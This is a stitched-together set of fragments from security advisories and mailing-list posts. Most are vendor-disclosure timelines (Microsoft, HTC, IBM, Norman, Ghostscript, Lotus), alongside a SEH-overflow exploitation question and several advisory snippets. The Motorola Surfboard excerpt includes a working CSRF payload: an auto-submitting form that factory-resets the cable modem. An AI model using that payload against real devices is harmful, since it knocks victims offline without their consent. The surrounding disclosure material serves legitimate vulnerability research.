CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

fix and a security bulletin release.

. 2009-11-09:
MSRC acknowledges reception of the new details and PoC and says that it
was passed to the product team to reproduce the bug and that they will
get back in touch soon.

. 2009-11-12:
MSRC says that it agrees about the seriousness of the issue and that it
has now involved the team responsible for the anti-exploitation
mechanisms to assess it correctly. The next estimated time for a status

(TAD-2011-001) Vulnerability in HTC Peep: Twitter Credentials Disclosure

2010-08-21: Taddong tries to report the vulnerability to HTC through the standard channels (web, e-mail...) without success. 
2010-08-23: Taddong contacts other security researchers (Thanks Alberto!) previously involved in reporting vulnerabilities to HTC in order to identify a valid contact or notification channel to let HTC know about the issue.
2010-08-25: Taddong spends around a week trying to identify a secure channel to report the issue to HTC, without any success. Please, read "The Seven Deadly Sins of Security Vulnerability Reporting"!! [1]
2010-09-03: Taddong finally decides to notify HTC about the vulnerability through the only available (but insecure) web channel and sends a brief technical report.
2010-09-04: HTC confirms they "...will investigate (the issue) and get back to us as soon as they get a reply."
2010-09-19: Taddong contacts HTC again (after 15 days) emphasizing this is a serious issue that requires immediate action, as Twitter credentials are directly exposed. Taddong tried to get an estimated date when an update would be available in order to proceed to publicly and responsibly disclose the vulnerability.
2010-09-20: HTC replies and they "...apologize for the inconvenience and the delay. The case is being investigated and they will get back to us as soon as they get a reply."
2010-10-03: Taddong contacts HTC again (one month since the initial notification) in order to gather specific details, such as an official confirmation of the vulnerability and an estimated fix release date, trying to coordinate the publication of the associated advisory.
2010-10-10: No response was received from HTC. Taddong tries to contact HTC again (+1 week).
2010-10-22: HTC replies apologizing (again) for the delay and... asking for "all the details for further investigation"? Taddong replies and clarifies it is still waiting for a confirmation or any chance to discuss the technical details. At the same time, an estimated deadline is set by Taddong for the public release on November 4, 2010 (two months since the original notification).

Re: Re: 3COM TFTPD Overflow: SEH Overwrite

I was asking if ws2_32.dll was compiled with SafeSEH (didn't know about the Olly plugin). Regarding the return address... I already have control of EIP, but can't point it directly to the stack, so I'm searching for a module with a suitable return address (with pop/pop/ret) to help me get back to that buffer. The issue was with the return address I was pointing to, and the fact that the module was compiled with SafeSEH. Is that enough detail?



Sea-Surfing on the Motorola Surfboard

<script>
document.getElementById(1).submit();
</script>

This CSRF will disconnect the user from the internet for longer.
“The process to get back online from a factory default condition could take from 5 to 30 minutes.”
<html>
<form id=2 method=post action='http://192.168.100.1/configdata.html'>
<input name='BUTTON_INPUT' value='Reset+All+Defaults'>
</form>
</html>

[TZO-32-2009] Norman generic bypass (RAR)

23/03/2009 : Asking for an update for the RAR Size sample

02/04/2009 : Norman confirms reproduction of RAR Method PoC and that they will release
             the patch a.s.a.p

02/04/2009 : Norman promises to get back with release dates/advisory information as soon
             as they have some firm dates

06/04/2009 : Norman confirms reproduction of RAR Headflags PoC

20/04/2009 : Norman confirms reproduction of the CAB PoC and that all reported 

Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

02.04.2009 - Forced partial disclosure
02.04.2009 - A known contact at IBM asks for the POC
02.04.2009 - POC is resent
02.04.2009 - A third person is added to the coordination "list"
04.04.2009 - Sending another POC file (RAR)
06.04.2009 - POC is acknowledged and promise is made to get back
             once the material has been analysed.
10.04.2009 - Sending another POC file (ZIP)
10.04.2009 - The third person ergo the "Cyber
Incident & Vulnerability Handling PM" is taking over coordination


PHP "multipart/form-data" denial of service

12:39 - CPU usage is still 100%, web server is not responsive.
13:08 - CPU usage is still 100%, web server is responsive.
14:08 - CPU usage is 97%
14:34 - CPU usage is 97%

Two hours later the CPU usage didn't get back to normal.
However, the web server is responding.

After I manually restart the Apache process, CPU usage gets back to normal.
However, those 65535 temporary files were not deleted.


CORE-2009-0625: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities

appropriate to solve these issues.

. 2009-09-04:
Microsoft thanks Core for postponing publication and says that it is
still discussing the fix plan and release date with the IE team and that
it will get back to Core in a week with the list of vulnerable platforms
and estimated patch release date.

. 2009-10-09:
Received a summary from Microsoft with an update on all open cases with
Core. Internet Explorer cases appear listed as "working with product

TSSA-2010-01 Ghostscript library Ins_MINDEX() integer overflow and heap corruption

* 19/10/2009: Vendor replies to our mail asking for details.
* 26/10/2009: Recontact vendor, ask for a valid pgp key.
* 05/11/2009: Recontact vendor who failed at providing a valid pgp key.
* 15/11/2009: Receive a valid pgp key from vendor. Provide details,
              including two PoCs to the Vendor.
* 16/12/2009: Recontact the vendor who doesn't get back to us.
* 05/01/2010: Vendor asks for more details including a complete bug analysis
              and patches.
* 06/01/2010: Provide full analysis and patches to the vendor.
* 06/01/2010: Vendor claims to have silently patched the vulnerability in
              their development branch.


CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor

draft advisory document. Core indicates that the publication date for the
security advisory is flexible and could be changed (postponed or brought
forward) on the basis of concrete and precise information about
availability of fixes. Security contact information for Autonomy requested.
2007-09-19: Email from Lotus Notes Security indicating that the bugs will
be investigated and that they will check and get back regarding the
requested security contact information for Autonomy.
2007-09-20: Email from Lotus Notes Security requesting proof-of-concept
code to validate the finding.
2007-09-21: Proof-of-concept code and sample of a malicious file sent to
Lotus Notes Security

Really, really, penultimate, PacSec CFP deadline, Aug 10.

cheers, 
--dr 

P.s. To the gentleman from McAfee who phoned me about his
submission, whose name I've forgotten: we didn't get your
mail, please get back in touch.
-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan    November 29/30 - 2007    http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp



Puppet Dashboard insecure by default

This problem affects all versions of Puppet Dashboard.

When I reported this as a problem to Puppet Labs, their response was
also alarming:

"I'm sorry it took so long to get back to you. We definitely don't
recommend people put their Dashboards on the public internet, but it's not
a code level security problem for us. I have instructed the docs
people here to update the docs to reflect the recommendation more strongly."

Puppet Dashboard is wide open by default and has no built-in security.

IE (Internet Explorer) pwns SecondLife

girl who made $1000000 (a million) out of the on-line world. This
means that today crooks are after your virtual persona rather than
your physical self. Therefore, security in virtual worlds is almost as
important as security in the physical world.

Now let's get back to the real issue. Attackers can steal the victim's
login credentials, therefore hijacking their virtual persona, by
simply tricking them into visiting a malicious Web page.

It is automatic and the user doesn't have to do anything (no user
interaction is required). I would rate this issue as Medium risk


